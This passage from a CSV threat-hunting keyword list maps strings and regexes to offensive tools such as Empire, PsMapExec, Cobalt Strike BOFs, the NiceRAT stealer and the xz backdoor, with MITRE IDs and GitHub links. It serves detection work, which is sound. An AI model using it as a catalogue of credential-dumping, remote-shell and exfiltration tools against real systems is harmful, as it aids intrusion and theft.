TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*Fuegoshell-server started*",".{0,1000}Fuegoshell\-server\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*fuff *-input-shell*",".{0,1000}fuff\s.{0,1000}\-input\-shell.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - 
TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*fuff *-scraperfile*",".{0,1000}fuff\s.{0,1000}\-scraperfile.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*fuff *-scrapers*",".{0,1000}fuff\s.{0,1000}\-scrapers.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*FULLSHADE/WindowsExploitationResources*",".{0,1000}FULLSHADE\/WindowsExploitationResources.{0,1000}","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","10","1453","310","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z" "*FullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn*",".{0,1000}FullyQualifiedAssemblyName\=0\;\\\\r\\\\nClrInstanceID\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*func decryptMalware(*",".{0,1000}func\sdecryptMalware\(.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*func_get_powershell_dll*",".{0,1000}func_get_powershell_dll.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*func_install_wine_dotnettojscript*",".{0,1000}func_install_wine_dotnettojscript.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*function Base64_Obfuscation*",".{0,1000}function\sBase64_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*function BXOR_Obfuscation*",".{0,1000}function\sBXOR_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*function DumpSAM*",".{0,1000}function\sDumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*function GNLPH*Get-ItemProperty ""HKLM:SAM\SAM\Domains\Account\Users\*",".{0,1000}function\sGNLPH.{0,1000}Get\-ItemProperty\s\""HKLM\:SAM\\SAM\\Domains\\Account\\Users\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*function ImpersonateFromParentPid*",".{0,1000}function\sImpersonateFromParentPid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*function psenum*",".{0,1000}function\spsenum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Function PsMapExec*",".{0,1000}Function\sPsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*function Use-Zeus*",".{0,1000}function\sUse\-Zeus.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*FunnyWolf/pystinger*",".{0,1000}FunnyWolf\/pystinger.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*fuse_evil.*",".{0,1000}fuse_evil\..{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*fuse_lowlevel.h*",".{0,1000}fuse_lowlevel\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fuxploider --url * --not-regex ""wrong file 
type""*",".{0,1000}fuxploider\s\-\-url\s.{0,1000}\s\-\-not\-regex\s\""wrong\sfile\stype\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*fuxploider*",".{0,1000}fuxploider.{0,1000}","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2950","492","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" "*fuzz_option.pl*",".{0,1000}fuzz_option\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*fuzzdb*",".{0,1000}fuzzdb.{0,1000}","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. 
and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7960","2074","2023-11-10T16:15:18Z","2015-09-10T17:54:31Z" "*fuzzers/rippackets.pl*",".{0,1000}fuzzers\/rippackets\.pl.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*fuzzfactory.py*",".{0,1000}fuzzfactory\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*fuzzrequest.py*",".{0,1000}fuzzrequest\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*FuzzySecurity/Dendrobate*",".{0,1000}FuzzySecurity\/Dendrobate.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*FuzzySecurity/Sharp-Suite*",".{0,1000}FuzzySecurity\/Sharp\-Suite.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*FuzzySecurity/StandIn*",".{0,1000}FuzzySecurity\/StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*fw_walk disable*",".{0,1000}fw_walk\sdisable.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*g_hDesk = Funcs::pOpenDesktopA(g_desktopName*",".{0,1000}g_hDesk\s\=\sFuncs\:\:pOpenDesktopA\(g_desktopName.{0,1000}","offensive_tool_keyword","HVNC","Standalone 
HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*g_hookedSleep.*",".{0,1000}g_hookedSleep\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*g0h4n/RDE1*",".{0,1000}g0h4n\/RDE1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*g0h4n/REC2*",".{0,1000}g0h4n\/REC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon 
APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*G0ldenGunSec/GetWebDAVStatus*",".{0,1000}G0ldenGunSec\/GetWebDAVStatus.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*G0ldenGunSec/SharpSecDump*",".{0,1000}G0ldenGunSec\/SharpSecDump.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*g0tmi1k*",".{0,1000}g0tmi1k.{0,1000}","offensive_tool_keyword","Github 
Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/g0tmi1k","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*G1Q+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ*",".{0,1000}G1Q\+4a0TgAHnlq2B8BKLZUP6wDHsjX6F5nVtUTU3dBQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.wiz.io/blog/cve-2024-3094-critical-rce-vulnerability-found-in-xz-utils#latest-wiz-research-findings-as-of-april-3-2024-33","10","10","N/A","N/A","N/A","N/A" "*G374U70F111(*",".{0,1000}G374U70F111\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3770K3N(*",".{0,1000}G3770K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3770K3N1NF0(*",".{0,1000}G3770K3N1NF0\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - 
TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37800KM4rK5(*",".{0,1000}G37800KM4rK5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3781111N6(*",".{0,1000}G3781111N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G3784D63(*",".{0,1000}G3784D63\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G378r0W53r5(br0W53rP47H5)*",".{0,1000}G378r0W53r5\(br0W53rP47H5\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37C00K13(*",".{0,1000}G37C00K13\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - 
T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37C0D35(*",".{0,1000}G37C0D35\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37CC5(*",".{0,1000}G37CC5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37D15C0rD(*",".{0,1000}G37D15C0rD\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37D474(*",".{0,1000}G37D474\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37H1570rY(*",".{0,1000}G37H1570rY\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 
- T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37P455W(*",".{0,1000}G37P455W\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37UHQ6U11D5(*",".{0,1000}G37UHQ6U11D5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 